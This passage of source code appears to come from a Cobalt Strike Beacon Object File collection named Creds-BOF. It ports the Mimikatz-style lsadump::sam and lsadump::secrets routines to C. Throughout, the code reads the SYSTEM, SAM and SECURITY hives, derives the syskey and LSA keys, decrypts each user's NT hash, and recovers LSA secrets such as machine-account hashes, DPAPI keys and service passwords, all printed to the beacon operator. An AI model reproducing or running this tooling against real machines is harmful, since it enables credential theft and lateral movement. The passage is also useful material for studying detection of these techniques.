    if (!ADVAPI32$CryptDecrypt(hKey, 0, FALSE, 0, decrypted, &decLen)) {
        ADVAPI32$CryptDestroyKey(hKey);
        return FALSE;
    }

    ADVAPI32$CryptDestroyKey(hKey);
    return TRUE;
}

// ============================================================================
// SAM Key Extraction
// ============================================================================

static BOOL GetSamKey(HKEY hSam, const BYTE sysKey[SYSKEY_LENGTH], BYTE samKey[SYSKEY_LENGTH], HCRYPTPROV hProv) {
    HKEY hAccount;
    DWORD size, type;
    BYTE* fData = NULL;
    BYTE decrypted[32];
    LONG res;
    DOMAIN_ACCOUNT_F* pDomAccF;
    SAM_KEY_DATA_AES* pAesKey;

    res = ADVAPI32$RegOpenKeyExW(hSam, L"SAM\\Domains\\Account", 0, KEY_READ, &hAccount);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] RegOpenKeyEx SAM\\Domains\\Account failed: %d\n", res);
        return FALSE;
    }

    size = 0;
    ADVAPI32$RegQueryValueExW(hAccount, L"F", NULL, &type, NULL, &size);
    if (size < sizeof(DOMAIN_ACCOUNT_F)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] F value size %u < expected %u\n", size, (DWORD)sizeof(DOMAIN_ACCOUNT_F));
        ADVAPI32$RegCloseKey(hAccount);
        return FALSE;
    }

    fData = (BYTE*)AllocMem(size);
    if (!fData) { ADVAPI32$RegCloseKey(hAccount); return FALSE; }

    res = ADVAPI32$RegQueryValueExW(hAccount, L"F", NULL, NULL, fData, &size);
    ADVAPI32$RegCloseKey(hAccount);
    if (res != ERROR_SUCCESS) { FreeMem(fData); return FALSE; }

    pDomAccF = (DOMAIN_ACCOUNT_F*)fData;
    if (pDomAccF->Revision != 2 && pDomAccF->Revision != 3) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Unknown DOMAIN_ACCOUNT_F Revision: %u\n", pDomAccF->Revision);
        FreeMem(fData);
        return FALSE;
    }

    if (pDomAccF->keys1.Revision == 2) {
        pAesKey = (SAM_KEY_DATA_AES*)&pDomAccF->keys1;
        BeaconPrintf(CALLBACK_OUTPUT, "[*] SAM key AES: DataLen=%u\n", pAesKey->DataLen);
        if (!DecryptAES128_CBC(hProv, sysKey, pAesKey->Salt, pAesKey->data, pAesKey->DataLen, decrypted)) {
            BeaconPrintf(CALLBACK_ERROR, "[!] DecryptAES128_CBC failed\n");
            FreeMem(fData);
            return FALSE;
        }
        MSVCRT$memcpy(samKey, decrypted, 16);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[!] Unknown SAM key Revision: %u (expected 2 for AES)\n", pDomAccF->keys1.Revision);
        FreeMem(fData);
        return FALSE;
    }

    FreeMem(fData);
    return TRUE;
}

// ============================================================================
// DES Key Generation from RID
// ============================================================================

static void DesKeyFromSid(DWORD rid, BYTE key1[8], BYTE key2[8]) {
    BYTE s1[7], s2[7];
    s1[0] = (BYTE)(rid & 0xff);
    s1[1] = (BYTE)((rid >> 8) & 0xff);
    s1[2] = (BYTE)((rid >> 16) & 0xff);
    s1[3] = (BYTE)((rid >> 24) & 0xff);
    s1[4] = s1[0]; s1[5] = s1[1]; s1[6] = s1[2];
    s2[0] = s1[3]; s2[1] = s1[0]; s2[2] = s1[1]; s2[3] = s1[2];
    s2[4] = s2[0]; s2[5] = s2[1]; s2[6] = s2[2];

    key1[0] = ODD_PARITY[(s1[0] >> 1) << 1];
    key1[1] = ODD_PARITY[(((s1[0] & 0x01) << 6) | (s1[1] >> 2)) << 1];
    key1[2] = ODD_PARITY[(((s1[1] & 0x03) << 5) | (s1[2] >> 3)) << 1];
    key1[3] = ODD_PARITY[(((s1[2] & 0x07) << 4) | (s1[3] >> 4)) << 1];
    key1[4] = ODD_PARITY[(((s1[3] & 0x0F) << 3) | (s1[4] >> 5)) << 1];
    key1[5] = ODD_PARITY[(((s1[4] & 0x1F) << 2) | (s1[5] >> 6)) << 1];
    key1[6] = ODD_PARITY[(((s1[5] & 0x3F) << 1) | (s1[6] >> 7)) << 1];
    key1[7] = ODD_PARITY[(s1[6] & 0x7F) << 1];

    key2[0] = ODD_PARITY[(s2[0] >> 1) << 1];
    key2[1] = ODD_PARITY[(((s2[0] & 0x01) << 6) | (s2[1] >> 2)) << 1];
    key2[2] = ODD_PARITY[(((s2[1] & 0x03) << 5) | (s2[2] >> 3)) << 1];
    key2[3] = ODD_PARITY[(((s2[2] & 0x07) << 4) | (s2[3] >> 4)) << 1];
    key2[4] = ODD_PARITY[(((s2[3] & 0x0F) << 3) | (s2[4] >> 5)) << 1];
    key2[5] = ODD_PARITY[(((s2[4] & 0x1F) << 2) | (s2[5] >> 6)) << 1];
    key2[6] = ODD_PARITY[(((s2[5] & 0x3F) << 1) | (s2[6] >> 7)) << 1];
    key2[7] = ODD_PARITY[(s2[6] & 0x7F) << 1];
}

// ============================================================================
// NT Hash Decryption
// ============================================================================

static BOOL DecryptNtHash(const BYTE* vData, DWORD vSize, const BYTE samKey[16], DWORD rid, 
                          BYTE ntHash[16], HCRYPTPROV hProv) {
    DWORD ntOffset, ntLength;
    BYTE* hashData;
    BYTE encryptedHash[16];
    BYTE desKey1[8], desKey2[8];
    
    if (vSize < 0xA8 + 8) return FALSE;
    
    ntOffset = *(DWORD*)(vData + 0xA8) + 0xCC;
    ntLength = *(DWORD*)(vData + 0xA8 + 4);
    
    if (ntLength < 4 || ntOffset + ntLength > vSize) return FALSE;
    
    hashData = (BYTE*)(vData + ntOffset);
    
    if (ntLength <= 24) return FALSE;
    
    WORD revision = *(WORD*)(hashData + 2);
    
    if (revision == 2) {
        BYTE aesIv[16];
        BYTE decrypted[32];
        DWORD encDataLen = ntLength - 24;
        
        MSVCRT$memcpy(aesIv, hashData + 8, 16);
        if (!DecryptAES128_CBC(hProv, samKey, aesIv, hashData + 24, encDataLen, decrypted))
            return FALSE;
        MSVCRT$memcpy(encryptedHash, decrypted, 16);
    } else {
        return FALSE;
    }
    
    DesKeyFromSid(rid, desKey1, desKey2);
    
    if (!DecryptDES_ECB(hProv, desKey1, encryptedHash, 8, ntHash) ||
        !DecryptDES_ECB(hProv, desKey2, encryptedHash + 8, 8, ntHash + 8))
        return FALSE;
    
    return TRUE;
}

// ============================================================================
// User Enumeration
// ============================================================================

static void EnumerateUsers(HKEY hSam, const BYTE samKey[16], HCRYPTPROV hProv) {
    HKEY hUsers;
    DWORD numSubKeys, maxKeyLen, i;
    wchar_t* keyName = NULL;
    DWORD keyNameLen;
    LONG res;
    DWORD userCount = 0;

    res = ADVAPI32$RegOpenKeyExW(hSam, L"SAM\\Domains\\Account\\Users", 0, KEY_READ, &hUsers);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open Users: %d\n", res);
        return;
    }

    ADVAPI32$RegQueryInfoKeyW(hUsers, NULL, NULL, NULL, &numSubKeys, &maxKeyLen, NULL, NULL, NULL, NULL, NULL, NULL);
    
    maxKeyLen++;
    keyName = (wchar_t*)AllocMem((maxKeyLen + 1) * sizeof(wchar_t));
    if (!keyName) { ADVAPI32$RegCloseKey(hUsers); return; }

    for (i = 0; i < numSubKeys; i++) {
        HKEY hUser;
        DWORD rid;
        BYTE* vData = NULL;
        DWORD vSize, type, usernameOffset, usernameLen, j;
        wchar_t* username;
        BYTE ntHash[16];
        char usernameA[128];

        keyNameLen = maxKeyLen;
        if (ADVAPI32$RegEnumKeyExW(hUsers, i, keyName, &keyNameLen, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) continue;
        if (MSVCRT$_wcsicmp(keyName, L"Names") == 0) continue;

        rid = MSVCRT$wcstoul(keyName, NULL, 16);
        if (rid == 0) continue;

        if (ADVAPI32$RegOpenKeyExW(hUsers, keyName, 0, KEY_READ, &hUser) != ERROR_SUCCESS) continue;

        vSize = 0;
        ADVAPI32$RegQueryValueExW(hUser, L"V", NULL, &type, NULL, &vSize);
        if (vSize == 0) { ADVAPI32$RegCloseKey(hUser); continue; }

        vData = (BYTE*)AllocMem(vSize);
        if (!vData) { ADVAPI32$RegCloseKey(hUser); continue; }

        if (ADVAPI32$RegQueryValueExW(hUser, L"V", NULL, NULL, vData, &vSize) != ERROR_SUCCESS) {
            FreeMem(vData);
            ADVAPI32$RegCloseKey(hUser);
            continue;
        }
        ADVAPI32$RegCloseKey(hUser);

        if (vSize < 0x0C + 8) { FreeMem(vData); continue; }

        usernameOffset = *(DWORD*)(vData + 0x0C) + 0xCC;
        usernameLen = *(DWORD*)(vData + 0x0C + 4);

        if (usernameOffset + usernameLen > vSize || usernameLen == 0) { FreeMem(vData); continue; }

        username = (wchar_t*)(vData + usernameOffset);
        for (j = 0; j < usernameLen / 2 && j < 127; j++)
            usernameA[j] = (char)username[j];
        usernameA[j] = '\0';

        if (DecryptNtHash(vData, vSize, samKey, rid, ntHash, hProv)) {
            char hashStr[64];
            FormatHex(ntHash, 16, hashStr, sizeof(hashStr));
            BeaconPrintf(CALLBACK_OUTPUT, "%s:%d:%s\n", usernameA, rid, hashStr);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "%s:%d:<empty>\n", usernameA, rid);
        }
        userCount++;
        FreeMem(vData);
    }

    FreeMem(keyName);
    ADVAPI32$RegCloseKey(hUsers);
    BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %u user(s)\n", userCount);
}

// ============================================================================
// Entry Point
// ============================================================================

void go(char* args, int len) {
    (void)args; (void)len;
    
    HKEY hSystem = NULL, hSam = NULL;
    BYTE sysKey[SYSKEY_LENGTH];
    BYTE samKey[SYSKEY_LENGTH];
    LONG res;
    HCRYPTPROV hProv = 0;
    char hexStr[64];

    BeaconPrintf(CALLBACK_OUTPUT, "\n=== lsadump::sam ===\n\n");

    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] CryptAcquireContext failed\n");
        return;
    }

    res = ADVAPI32$RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM", 0, KEY_READ, &hSystem);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open SYSTEM: %d\n", res);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }

    if (!GetSyskey(hSystem, sysKey)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to extract syskey\n");
        ADVAPI32$RegCloseKey(hSystem);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }
    FormatHex(sysKey, SYSKEY_LENGTH, hexStr, sizeof(hexStr));
    BeaconPrintf(CALLBACK_OUTPUT, "Syskey: %s\n", hexStr);
    ADVAPI32$RegCloseKey(hSystem);

    res = ADVAPI32$RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SAM", 0, KEY_READ, &hSam);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open SAM: %d\n", res);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }

    if (!GetSamKey(hSam, sysKey, samKey, hProv)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to decrypt SAM key\n");
        ADVAPI32$RegCloseKey(hSam);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }
    FormatHex(samKey, SYSKEY_LENGTH, hexStr, sizeof(hexStr));
    BeaconPrintf(CALLBACK_OUTPUT, "SAMKey: %s\n", hexStr);
    BeaconPrintf(CALLBACK_OUTPUT, "\n");

    EnumerateUsers(hSam, samKey, hProv);

    ADVAPI32$RegCloseKey(hSam);
    ADVAPI32$CryptReleaseContext(hProv, 0);
}


================================================
FILE: Creds-BOF/lsadump/secrets.c
================================================
/*
 * lsadump_secrets BOF by shashinma
 * Dumps LSA secrets from the SECURITY registry hive
 * Requires SYSTEM privileges
 */

#include "include/secrets.h"
#include "lsadump_helper.c"

// ============================================================================
// Hash Computation Functions
// ============================================================================

static BOOL ComputeMD4(HCRYPTPROV hProv, const BYTE* data, DWORD dataLen, BYTE hash[16]) {
    HCRYPTHASH hHash = 0;
    DWORD hashLen = 16;
    BOOL result = FALSE;

    if (!ADVAPI32$CryptCreateHash(hProv, CALG_MD4, 0, 0, &hHash))
        return FALSE;

    if (ADVAPI32$CryptHashData(hHash, data, dataLen, 0))
        result = ADVAPI32$CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0);

    ADVAPI32$CryptDestroyHash(hHash);
    return result;
}

static BOOL ComputeSHA1(HCRYPTPROV hProv, const BYTE* data, DWORD dataLen, BYTE hash[20]) {
    HCRYPTHASH hHash = 0;
    DWORD hashLen = 20;
    BOOL result = FALSE;

    if (!ADVAPI32$CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
        return FALSE;

    if (ADVAPI32$CryptHashData(hHash, data, dataLen, 0))
        result = ADVAPI32$CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0);

    ADVAPI32$CryptDestroyHash(hHash);
    return result;
}

// ============================================================================
// Domain Information
// ============================================================================

static void GetDomainInfo(HKEY hSecurity) {
    HKEY hPolicy, hKey;
    DWORD size, type;
    BYTE* buffer = NULL;
    
    if (ADVAPI32$RegOpenKeyExW(hSecurity, L"Policy", 0, KEY_READ, &hPolicy) != ERROR_SUCCESS)
        return;

    if (ADVAPI32$RegOpenKeyExW(hPolicy, L"PolAcDmN", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        size = 0;
        ADVAPI32$RegQueryValueExW(hKey, NULL, NULL, &type, NULL, &size);
        if (size > 0) {
            buffer = (BYTE*)AllocMem(size);
            if (buffer && ADVAPI32$RegQueryValueExW(hKey, NULL, NULL, NULL, buffer, &size) == ERROR_SUCCESS) {
                if (size >= 8) {
                    DWORD strLen = *(DWORD*)buffer;
                    wchar_t* domainName = (wchar_t*)(buffer + 8);
                    if (strLen > 0) {
                        BeaconPrintf(CALLBACK_OUTPUT, "Domain     : %S\n", domainName);
                    }
                }
            }
            FreeMem(buffer);
        }
        ADVAPI32$RegCloseKey(hKey);
    }

    if (ADVAPI32$RegOpenKeyExW(hPolicy, L"PolPrDmN", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        size = 0;
        ADVAPI32$RegQueryValueExW(hKey, NULL, NULL, &type, NULL, &size);
        if (size > 0) {
            buffer = (BYTE*)AllocMem(size);
            if (buffer && ADVAPI32$RegQueryValueExW(hKey, NULL, NULL, NULL, buffer, &size) == ERROR_SUCCESS) {
                if (size >= 8) {
                    DWORD strLen = *(DWORD*)buffer;
                    wchar_t* domainName = (wchar_t*)(buffer + 8);
                    if (strLen > 0) {
                        BeaconPrintf(CALLBACK_OUTPUT, "Domain name: %S\n", domainName);
                    }
                }
            }
            FreeMem(buffer);
        }
        ADVAPI32$RegCloseKey(hKey);
    }

    if (ADVAPI32$RegOpenKeyExW(hPolicy, L"PolDnDDN", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        size = 0;
        ADVAPI32$RegQueryValueExW(hKey, NULL, NULL, &type, NULL, &size);
        if (size > 0) {
            buffer = (BYTE*)AllocMem(size);
            if (buffer && ADVAPI32$RegQueryValueExW(hKey, NULL, NULL, NULL, buffer, &size) == ERROR_SUCCESS) {
                if (size >= 8) {
                    DWORD strLen = *(DWORD*)buffer;
                    wchar_t* dnsName = (wchar_t*)(buffer + 8);
                    if (strLen > 0) {
                        BeaconPrintf(CALLBACK_OUTPUT, "Domain FQDN: %S\n", dnsName);
                    }
                }
            }
            FreeMem(buffer);
        }
        ADVAPI32$RegCloseKey(hKey);
    }

    if (ADVAPI32$RegOpenKeyExW(hPolicy, L"PolRevision", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        DWORD revision[2] = {0, 0};
        size = sizeof(revision);
        if (ADVAPI32$RegQueryValueExW(hKey, NULL, NULL, NULL, (BYTE*)revision, &size) == ERROR_SUCCESS) {
            BeaconPrintf(CALLBACK_OUTPUT, "\nPolicy subsystem is : %d.%d\n", revision[0] >> 16, revision[0] & 0xFFFF);
        }
        ADVAPI32$RegCloseKey(hKey);
    }

    ADVAPI32$RegCloseKey(hPolicy);
}

// ============================================================================
// AES-256 Derive and Decrypt
// ============================================================================

static BOOL DeriveAndDecrypt(HCRYPTPROV hProv, const BYTE* key, DWORD keySize, 
                              const BYTE* lazyiv, BYTE* data, DWORD* dataSize) {
    HCRYPTHASH hHash = 0;
    HCRYPTKEY hKey = 0;
    BYTE derivedKey[32];
    DWORD hashLen = 32;
    DWORD i;
    AES_KEY_BLOB keyBlob;
    DWORD mode = CRYPT_MODE_ECB;
    BOOL result = FALSE;

    if (!ADVAPI32$CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash))
        return FALSE;

    ADVAPI32$CryptHashData(hHash, (BYTE*)key, keySize, 0);
    for (i = 0; i < 1000; i++)
        ADVAPI32$CryptHashData(hHash, (BYTE*)lazyiv, LAZY_NT6_IV_SIZE, 0);

    ADVAPI32$CryptGetHashParam(hHash, HP_HASHVAL, derivedKey, &hashLen, 0);
    ADVAPI32$CryptDestroyHash(hHash);

    keyBlob.header.bType = PLAINTEXTKEYBLOB;
    keyBlob.header.bVersion = CUR_BLOB_VERSION;
    keyBlob.header.reserved = 0;
    keyBlob.header.aiKeyAlg = CALG_AES_256;
    keyBlob.keySize = 32;
    MSVCRT$memcpy(keyBlob.key, derivedKey, 32);

    if (!ADVAPI32$CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey))
        return FALSE;

    ADVAPI32$CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&mode, 0);
    result = ADVAPI32$CryptDecrypt(hKey, 0, FALSE, 0, data, dataSize);
    ADVAPI32$CryptDestroyKey(hKey);
    
    return result;
}

// ============================================================================
// Get LSA Keys
// ============================================================================

static BOOL GetLsaKeys(HKEY hSecurity, const BYTE sysKey[SYSKEY_LENGTH], HCRYPTPROV hProv, LSA_KEYS_INFO* pInfo) {
    HKEY hPolicy, hPolKey;
    LONG res;
    DWORD size, type;
    PBYTE buffer = NULL;
    DWORD encryptedSize, secretSize;
    DWORD i, offset;

    MSVCRT$memset(pInfo, 0, sizeof(LSA_KEYS_INFO));

    res = ADVAPI32$RegOpenKeyExW(hSecurity, L"Policy", 0, KEY_READ, &hPolicy);
    if (res != ERROR_SUCCESS) return FALSE;

    res = ADVAPI32$RegOpenKeyExW(hPolicy, L"PolEKList", 0, KEY_READ, &hPolKey);
    if (res != ERROR_SUCCESS) {
        ADVAPI32$RegCloseKey(hPolicy);
        return FALSE;
    }

    size = 0;
    ADVAPI32$RegQueryValueExW(hPolKey, NULL, NULL, &type, NULL, &size);
    if (size == 0) {
        ADVAPI32$RegCloseKey(hPolKey);
        ADVAPI32$RegCloseKey(hPolicy);
        return FALSE;
    }

    buffer = (PBYTE)AllocMem(size);
    if (!buffer) {
        ADVAPI32$RegCloseKey(hPolKey);
        ADVAPI32$RegCloseKey(hPolicy);
        return FALSE;
    }

    ADVAPI32$RegQueryValueExW(hPolKey, NULL, NULL, NULL, buffer, &size);
    ADVAPI32$RegCloseKey(hPolKey);
    ADVAPI32$RegCloseKey(hPolicy);

    encryptedSize = size - OFF_ENCRYPTED;
    if (!DeriveAndDecrypt(hProv, sysKey, SYSKEY_LENGTH, buffer + OFF_LAZYIV, buffer + OFF_ENCRYPTED, &encryptedSize)) {
        FreeMem(buffer);
        return FALSE;
    }

    secretSize = *(DWORD*)(buffer + OFF_ENCRYPTED + OFF_SECRET_SIZE);
    if (secretSize == 0 || secretSize > 4096) {
        FreeMem(buffer);
        return FALSE;
    }

    pInfo->keys = (PBYTE)AllocMem(secretSize);
    if (!pInfo->keys) {
        FreeMem(buffer);
        return FALSE;
    }
    MSVCRT$memcpy(pInfo->keys, buffer + OFF_ENCRYPTED + OFF_SECRET_DATA, secretSize);
    pInfo->nbKeys = *(DWORD*)(pInfo->keys + OFF_KEYS_NBKEYS);

    MSVCRT$memcpy(pInfo->currentKeyId, pInfo->keys + OFF_KEYS_CURRENTKEYID, 16);

    offset = 0;
    for (i = 0; i < pInfo->nbKeys; i++) {
        PBYTE keyPtr = pInfo->keys + OFF_KEYS_KEYS + offset;
        DWORD keySize = *(DWORD*)(keyPtr + OFF_KEY_KEYSIZE);
        
        if (MSVCRT$memcmp(pInfo->currentKeyId, keyPtr + OFF_KEY_KEYID, 16) == 0) {
            pInfo->currentKeySize = keySize;
            if (keySize <= 64) {
                MSVCRT$memcpy(pInfo->currentKey, keyPtr + OFF_KEY_KEY, keySize);
            }
            break;
        }
        offset += OFF_KEY_KEY + keySize;
    }

    FreeMem(buffer);
    return TRUE;
}

// ============================================================================
// Find LSA Key by GUID
// ============================================================================

static BOOL FindLsaKey(LSA_KEYS_INFO* pInfo, const BYTE* keyId, PBYTE* pKey, PDWORD pKeySize) {
    DWORD i, offset = 0;
    PBYTE keyPtr;
    DWORD keySize;

    for (i = 0; i < pInfo->nbKeys; i++) {
        keyPtr = pInfo->keys + OFF_KEYS_KEYS + offset;
        keySize = *(DWORD*)(keyPtr + OFF_KEY_KEYSIZE);
        
        if (MSVCRT$memcmp(keyId, keyPtr + OFF_KEY_KEYID, 16) == 0) {
            *pKey = keyPtr + OFF_KEY_KEY;
            *pKeySize = keySize;
            return TRUE;
        }
        
        offset += OFF_KEY_KEY + keySize;
    }
    return FALSE;
}

// ============================================================================
// Decrypt Secret
// ============================================================================

static BOOL DecryptSecretValue(HKEY hSecrets, const wchar_t* secretName, const wchar_t* valueName,
                               LSA_KEYS_INFO* pInfo, HCRYPTPROV hProv, PBYTE* pData, PDWORD pSize) {
    HKEY hSecret, hVal;
    LONG res;
    DWORD size, type, encryptedSize, secretSize;
    PBYTE buffer = NULL;
    PBYTE key;
    DWORD keySize;

    res = ADVAPI32$RegOpenKeyExW(hSecrets, secretName, 0, KEY_READ, &hSecret);
    if (res != ERROR_SUCCESS) return FALSE;

    res = ADVAPI32$RegOpenKeyExW(hSecret, valueName, 0, KEY_READ, &hVal);
    ADVAPI32$RegCloseKey(hSecret);
    if (res != ERROR_SUCCESS) return FALSE;

    size = 0;
    ADVAPI32$RegQueryValueExW(hVal, NULL, NULL, &type, NULL, &size);
    if (size == 0 || size < OFF_ENCRYPTED) {
        ADVAPI32$RegCloseKey(hVal);
        return FALSE;
    }

    buffer = (PBYTE)AllocMem(size);
    if (!buffer) {
        ADVAPI32$RegCloseKey(hVal);
        return FALSE;
    }

    ADVAPI32$RegQueryValueExW(hVal, NULL, NULL, NULL, buffer, &size);
    ADVAPI32$RegCloseKey(hVal);

    if (!FindLsaKey(pInfo, buffer + OFF_KEYID, &key, &keySize)) {
        FreeMem(buffer);
        return FALSE;
    }

    encryptedSize = size - OFF_ENCRYPTED;
    if (!DeriveAndDecrypt(hProv, key, keySize, buffer + OFF_LAZYIV, buffer + OFF_ENCRYPTED, &encryptedSize)) {
        FreeMem(buffer);
        return FALSE;
    }

    secretSize = *(DWORD*)(buffer + OFF_ENCRYPTED + OFF_SECRET_SIZE);
    if (secretSize == 0 || secretSize > 65536) {
        FreeMem(buffer);
        return FALSE;
    }

    *pData = (PBYTE)AllocMem(secretSize);
    if (*pData) {
        MSVCRT$memcpy(*pData, buffer + OFF_ENCRYPTED + OFF_SECRET_DATA, secretSize);
        *pSize = secretSize;
    }

    FreeMem(buffer);
    return (*pData != NULL);
}

// ============================================================================
// Display Secret
// ============================================================================

static void DisplaySecretData(const wchar_t* prefix, const BYTE* data, DWORD size, HCRYPTPROV hProv, const wchar_t* name) {
    char prefixA[16];
    DWORD i;
    BOOL isPrintable = TRUE;

    for (i = 0; prefix[i] && i < 15; i++)
        prefixA[i] = (char)prefix[i];
    prefixA[i] = '\0';

    for (i = 0; i < size; i++) {
        if (data[i] != 0 && (data[i] < 0x20 || data[i] > 0x7e)) {
            isPrintable = FALSE;
            break;
        }
    }

    char hexBuf[512];
    if (isPrintable && size > 2) {
        BeaconPrintf(CALLBACK_OUTPUT, "%s/text: %.*S\n", prefixA, size / sizeof(wchar_t), data);
    } else {
        FormatHex(data, size > 64 ? 64 : size, hexBuf, sizeof(hexBuf));
        if (size > 64)
            BeaconPrintf(CALLBACK_OUTPUT, "%s/hex : %s...\n", prefixA, hexBuf);
        else
            BeaconPrintf(CALLBACK_OUTPUT, "%s/hex : %s\n", prefixA, hexBuf);
    }

    if (MSVCRT$_wcsicmp(name, L"$MACHINE.ACC") == 0 && size > 0) {
        BYTE ntlmHash[16];
        BYTE sha1Hash[20];
        
        if (ComputeMD4(hProv, data, size, ntlmHash)) {
            FormatHex(ntlmHash, 16, hexBuf, sizeof(hexBuf));
            BeaconPrintf(CALLBACK_OUTPUT, "    NTLM: %s\n", hexBuf);
        }
        
        if (ComputeSHA1(hProv, data, size, sha1Hash)) {
            FormatHex(sha1Hash, 20, hexBuf, sizeof(hexBuf));
            BeaconPrintf(CALLBACK_OUTPUT, "    SHA1: %s\n", hexBuf);
        }
    }

    if (MSVCRT$_wcsicmp(name, L"DPAPI_SYSTEM") == 0 && size == sizeof(DWORD) + 2 * SHA_DIGEST_LENGTH) {
        char hexBuf2[64], hexBuf3[64];
        FormatHex(data + sizeof(DWORD), 2 * SHA_DIGEST_LENGTH, hexBuf, sizeof(hexBuf));
        FormatHex(data + sizeof(DWORD), SHA_DIGEST_LENGTH, hexBuf2, sizeof(hexBuf2));
        FormatHex(data + sizeof(DWORD) + SHA_DIGEST_LENGTH, SHA_DIGEST_LENGTH, hexBuf3, sizeof(hexBuf3));
        BeaconPrintf(CALLBACK_OUTPUT, "    full: %s\n    m/u : %s / %s\n", hexBuf, hexBuf2, hexBuf3);
    }

    if (MSVCRT$_wcsicmp(name, L"NL$KM") == 0 && size == 64) {
        BeaconPrintf(CALLBACK_OUTPUT, "    (Cached domain credentials key)\n");
    }
}

// ============================================================================
// Enumerate Secrets
// ============================================================================

static void EnumerateSecrets(HKEY hSecurity, LSA_KEYS_INFO* pInfo, HCRYPTPROV hProv) {
    HKEY hSecrets;
    LONG res;
    DWORD numSubKeys = 0, maxKeyLen = 0;
    wchar_t* keyName = NULL;
    DWORD i, keyNameLen;
    PBYTE curData, oldData;
    DWORD curSize, oldSize;

    res = ADVAPI32$RegOpenKeyExW(hSecurity, L"Policy\\Secrets", 0, KEY_READ, &hSecrets);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open Secrets: %d\n", res);
        return;
    }

    ADVAPI32$RegQueryInfoKeyW(hSecrets, NULL, NULL, NULL, &numSubKeys, &maxKeyLen, NULL, NULL, NULL, NULL, NULL, NULL);

    maxKeyLen++;
    keyName = (wchar_t*)AllocMem((maxKeyLen + 1) * sizeof(wchar_t));
    if (!keyName) {
        ADVAPI32$RegCloseKey(hSecrets);
        return;
    }

    for (i = 0; i < numSubKeys; i++) {
        char nameA[128];
        DWORD j;

        keyNameLen = maxKeyLen;
        res = ADVAPI32$RegEnumKeyExW(hSecrets, i, keyName, &keyNameLen, NULL, NULL, NULL, NULL);
        if (res != ERROR_SUCCESS) continue;

        for (j = 0; j < 127 && keyName[j]; j++) nameA[j] = (char)keyName[j];
        nameA[j] = '\0';

        BeaconPrintf(CALLBACK_OUTPUT, "\nSecret  : %s", nameA);

        if (MSVCRT$_wcsnicmp(keyName, L"_SC_", 4) == 0) {
            wchar_t servicePath[256];
            HKEY hService;
            MSVCRT$swprintf_s(servicePath, 256, L"SYSTEM\\CurrentControlSet\\Services\\%s", keyName + 4);
            if (ADVAPI32$RegOpenKeyExW(HKEY_LOCAL_MACHINE, servicePath, 0, KEY_READ, &hService) == ERROR_SUCCESS) {
                wchar_t objectName[128];
                DWORD objNameSize = sizeof(objectName);
                if (ADVAPI32$RegQueryValueExW(hService, L"ObjectName", NULL, NULL, (BYTE*)objectName, &objNameSize) == ERROR_SUCCESS) {
                    BeaconPrintf(CALLBACK_OUTPUT, " / service '%s' with username : %S", nameA + 4, objectName);
                }
                ADVAPI32$RegCloseKey(hService);
            }
        }
        BeaconPrintf(CALLBACK_OUTPUT, "\n");

        curData = NULL; curSize = 0;
        oldData = NULL; oldSize = 0;

        if (DecryptSecretValue(hSecrets, keyName, L"CurrVal", pInfo, hProv, &curData, &curSize)) {
            DisplaySecretData(L"cur", curData, curSize, hProv, keyName);
            FreeMem(curData);
        }

        if (DecryptSecretValue(hSecrets, keyName, L"OldVal", pInfo, hProv, &oldData, &oldSize)) {
            DisplaySecretData(L"old", oldData, oldSize, hProv, keyName);
            FreeMem(oldData);
        }
    }

    FreeMem(keyName);
    ADVAPI32$RegCloseKey(hSecrets);
}

// ============================================================================
// Entry Point
// ============================================================================

void go(char* args, int len) {
    (void)args; (void)len;
    
    HKEY hSystem = NULL, hSecurity = NULL;
    BYTE sysKey[SYSKEY_LENGTH];
    LONG res;
    HCRYPTPROV hProv = 0;
    LSA_KEYS_INFO lsaInfo;
    char computerName[256];
    DWORD computerNameLen = 256;
    char hexStr[128];

    BeaconPrintf(CALLBACK_OUTPUT, "\n");

    res = ADVAPI32$RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM", 0, KEY_READ, &hSystem);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open SYSTEM: %d\n", res);
        return;
    }

    if (!GetSyskey(hSystem, sysKey)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to extract syskey\n");
        ADVAPI32$RegCloseKey(hSystem);
        return;
    }

    KERNEL32$GetComputerNameA(computerName, &computerNameLen);
    BeaconPrintf(CALLBACK_OUTPUT, "Local name : %s\n", computerName);
    FormatHex(sysKey, SYSKEY_LENGTH, hexStr, sizeof(hexStr));
    BeaconPrintf(CALLBACK_OUTPUT, "SysKey : %s\n", hexStr);
